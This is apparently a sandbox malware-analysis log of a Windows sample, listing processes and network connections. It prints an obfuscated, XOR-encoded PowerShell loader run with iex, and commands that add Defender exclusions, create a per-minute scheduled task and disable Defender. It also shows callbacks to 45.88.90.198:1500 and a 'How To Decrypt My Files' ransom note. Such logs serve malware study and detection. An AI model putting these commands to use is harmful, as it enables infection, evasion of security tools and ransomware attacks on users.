AaABKAGoATQBtAE8AegBGAHkATgB5AG8AbQBOAHkAQQA4AGMAaABzADgASgBnAEkAbQBJAEgASQBlAFAAVABNADIASABqAHMAdwBJAEQATQBnAEsAMwBvAGgASgBpAEEANwBQAEQAVgB5AFAARABNAC8ATgAzAHQAcABYADEAaAB5AGMAbgBKAHkAQwBSAFkAKwBQAGgAcwAvAEkAagAwAGcASgBuAHAAdwBPAFQAYwBnAFAARABjACsAWQBXAEIAdwBlAHcAOQBmAFcASABKAHkAYwBuAEkAaQBKAHoAQQArAE8AegBGAHkASQBTAFkAegBKAGoAcwB4AGMAagBjAHEASgBqAGMAZwBQAEgASQB3AFAAVAAwACsAYwBnAFEANwBJAEMAWQBuAE0AegA0AEMASQBEADAAbQBOAHoARQBtAGUAaABzADgASgBnAEkAbQBJAEgASQArAEkAaABNADIATgBpAEEAMwBJAFMARgArAGMAZwBjAGIAUABDAFoAaABZAEgASQAyAEoAUQBFADcASwBEAGQAKwBjAGkAYwA3AFAAQwBaAHkATgBEADQAYwBOAHkAVQBDAEkARAAwAG0ATgB6AEUAbQBmAG4ASQA5AEoAeQBaAHkASgB6AHMAOABKAG4ASQArAEkAagBRACsASABUADQAMgBBAGkAQQA5AEoAagBjAHgASgBuAHQAcABYADEAaAB5AGMAbgBKAHkASQBpAGMAdwBQAGoAcwB4AGMAaQBFAG0ATQB5AFkANwBNAFgASQBrAFAAVABzADIAYwBoAEEAcgBJAGoATQBoAEkAWABwADcAWAAxAGgAeQBjAG4ASgB5AEsAVgA5AFkAYwBuAEoAeQBjAG4ASgB5AGMAbgBJAGIAUABDAFkAQwBKAGkAQgB5AFAAagBzAHcAYwBtADkAeQBIAGoAMAB6AE4AaAA0ADcATQBDAEEAegBJAEMAdAA2AGMARABOAHcAZQBYAEEALwBjAEgAbAB3AEkAVAB0ADgAYwBIAGwAdwBOAGoANAArAGMASAB0AHAAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAHMAOABKAGcASQBtAEkASABJAHoAUAB5AEUANwBjAG0AOQB5AEYAVABjAG0AQQBpAEEAOQBNAFIATQAyAE4AaQBBADMASQBTAEYANgBQAGoAcwB3AGYAbgBKAHcARQB6ADkAdwBlAFgAQQBoAGMASABsAHcATwB3AEUAeABNAHoAeAB3AGUAWABBAFEAYwBIAGwAdwBKAHoAUQAwAE4AeQBCAHcAZQAyAGwAZgBXAEgASgB5AGMAbgBKAHkAYwBuAEoAeQBHAHoAdwBtAEEAaQBZAGcAYwBqAFEANwBQAEQATQArAGMAbQA5AHkARwB6AHcAbQBBAGkAWQBnAGYAQgBNADIATgBuAG8AegBQAHkARQA3AGYAbgBKAGkASwBtAHQAbgBlADIAbABmAFcASABKAHkAYwBuAEoAeQBjAG4ASgB5AEoAegBzADgASgBuAEkAOQBQAGoAWgB5AGIAMwBKAGkAYQBWADkAWQBjAG4ASgB5AGMAbgBKAHkAYwBuAEkARQBPAHkAQQBtAEoAegBNACsAQQBpAEEAOQBKAGoAYwB4AEoAbgBvADAATwB6AHcAegBQAG4ANQB5AGUAZwBjAGIAUABDAFoAaABZAEgAdABpAEsAbQBOACsAYwBtAEkAcQBaAG0ASgArAGMAagAwAG4ASgBuAEkAOQBQAGoAWgA3AGEAVgA5AFkAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAEUAOQBQAEMARQA5AFAAagBkADgAQgBTAEEANwBKAGoAYwBlAE8AegB3ADMAZQBqADAAKwBOAG4AdABwAFgAMQBoAHkAYwBuAEoAeQBjAG4ASgB5AGMAagBBAHIASgBqAGMASgBEADMASQBpAE0AeQBZAHgATwBuAEoAdgBjAGoAdwAzAEoAWABJAHcASwB5AFkAMwBDAFEAOQB5AEsAWABKAGkASwBtAFYAbgBjAGkAOQBwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkASAB6AE0AZwBJAFQAbwB6AFAAbgB3AFIAUABTAEkAcgBlAGkASQB6AEoAagBFADYAZgBuAEoAaQBmAG4ASQAwAE8AegB3AHoAUABuADUAeQBZADMAdABwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkAQgBEAHMAZwBKAGkAYwB6AFAAZwBJAGcAUABTAFkAMwBNAFMAWgA2AE4ARABzADgATQB6ADUAKwBjAG4AbwBIAEcAegB3AG0AWQBXAEIANwBZAGkAcABqAGYAbgBJADkAUABqAFoAKwBjAGoAMABuAEoAbgBJADkAUABqAFoANwBhAFYAOQBZAGMAbgBKAHkAYwBpADkAZgBXAEMAOQBmAFcASABBAFMAWAAxAGgAZgBXAEIATQAyAE4AbgA4AEcASwB5AEkAMwBjAG4AWQBoAEkARABGAHkAZgB4ADQAegBQAEQAVQBuAE0AegBVADMAYwBoAEUAQgBPAGoATQBnAEkAbgBKAGYAVwBGADkAWQBDAFEASQB6AEoAagBFADYARAAyAGgAbwBFAEMAcwBpAE0AeQBFAGgAZQBuAHQAZgBXAEgARgB5AEEAQgBjAFQARgBuAEkAUgBFAHcAQQBYAEYAQQBjAGUASABnAHQAZgBXAEgARgB5AEEAQgBjAEMASABoAE0AUgBGADMASQBHAEcAaABkAHkASABoAHMAYwBHAFgASQBUAEgAQgBaAHkARQB4AFEARwBGAHcAQgB5AEIAaABvAFgAYwBoADAASABCAGcASQBIAEIAbgBJAEwASABRAGQAeQBCAFIATQBjAEIAbgBJAEcASABYAEkAUQBGADMASQBSAEUAeAA0AGUARgB4AFoAeQBFAHgAdwBXAGMAZwBBAFgASABCAE0AZgBGADMASQBHAEcAaABkAHkAQgBoAGMAaABKAG4AdwAzAEsAagBkAHkAQgBoADEAeQBFAHgAdwBMAEIAaABvAGIASABCAFYAeQBDAHgAMABIAGMAZwBVAFQASABBAFoAZgBXAEMAVQAxAE4AeQBaAHkAYwBEAG8AbQBKAGkASQBoAGEASAAxADkATgBUAHMAbQBPAGkAYwB3AGYARABFADkAUAAzADAAVwBQAFQAMABsAE0AeQBJAGkATgB5AEIAOQBHAHcAQQBSAGYAUwBBAHoASgBYADAALwBNAHoAcwA4AGYAUgBzAEEARQBRADAAUgBQAFQAdwA4AE4AegBFAG0AZgBEAGMAcQBOADMAQgB5AGYAeAAxAHkAYwBCAEYAbwBEAGcAYwBoAE4AeQBBAGgARABuAFkAMwBQAEMAUgBvAEIAdwBFAFgAQQBCAHcAVABIAHgAYwBPAEUAeQBJAGkARgBqAE0AbQBNAHcANABlAFAAVABFAHoAUABnADQARwBOAHoAOABpAEQAaABzAEEARQBRADAAUgBQAFQAdwA4AE4AegBFAG0AZgBEAGMAcQBOADMAQgBmAFcAQQBFAG0ATQB5AEEAbQBmAHcASQBnAFAAVABFADMASQBTAEYAeQBmAHgAUQA3AFAAagBjAEMATQB5AFkANgBjAG4AQQBSAGEAQQA0AEgASQBUAGMAZwBJAFEANQAyAE4AegB3AGsAYQBBAGMAQgBGAHcAQQBjAEUAeAA4AFgARABoAE0AaQBJAGgAWQB6AEoAagBNAE8ASABqADAAeABNAHoANABPAEIAagBjAC8ASQBnADQAYgBBAEIARQBOAEUAVAAwADgAUABEAGMAeABKAG4AdwAzAEsAagBkAHcAYwBnAD0APQAiAA0ACgAkAFgAbwByAF8AVgBhAGwAIAA9ACAAOAAyAA0ACgAkAHgAcgAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABlAGgAZQBoAGUAKQANAAoAJABmAGEAZgBhAGYAIAA9ACAAJAB4AHIAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAHIAZQB0AHUAcgBuACAAJABfACAALQBiAHgAbwByACAAJABYAG8AcgBfAFYAYQBsACAAfQANAAoAJABkAGUAYwBzAGMAcgAgAD0AIABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAdQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABmAGEAZgBhAGYAKQANAAoAaQBlAHgAIAAkAGQAZQBjAHMAYwByAA0ACgA=
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r3ebudtm\r3ebudtm.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A07.tmp" "c:\Users\Admin\AppData\Local\Temp\r3ebudtm\CSCA34A7BD2B97740449C58EA6BA518F6C.TMP"
C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe
"C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IRC_Connect.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowSC.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowSC.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowSC" /tr "C:\Users\Admin\AppData\Roaming\WindowSC.exe"
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\New Microsoft Word Document.docx" /o ""
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff928f73cb8,0x7ff928f73cc8,0x7ff928f73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,14039303063002309672,15851512992209912116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start lsass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 45.88.90.198 1500 <123456789> B6C67BBF4D5C9EEE6867
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff928f73cb8,0x7ff928f73cc8,0x7ff928f73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1980 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2316 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4252 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=5116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1968,11333774440982826112,4643859199394540793,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3688 /prefetch:8
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
C:\Users\Admin\AppData\Roaming\WindowSC.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 45.88.90.198:1500 | tcp | |
| DE | 45.88.90.198:1500 | tcp | |
| DE | 45.88.90.198:1500 | tcp | |
| DE | 45.88.90.198:1500 | tcp | |
| DE | 45.88.90.198:1500 | tcp | |
| DE | 45.88.90.198:1500 | tcp | |
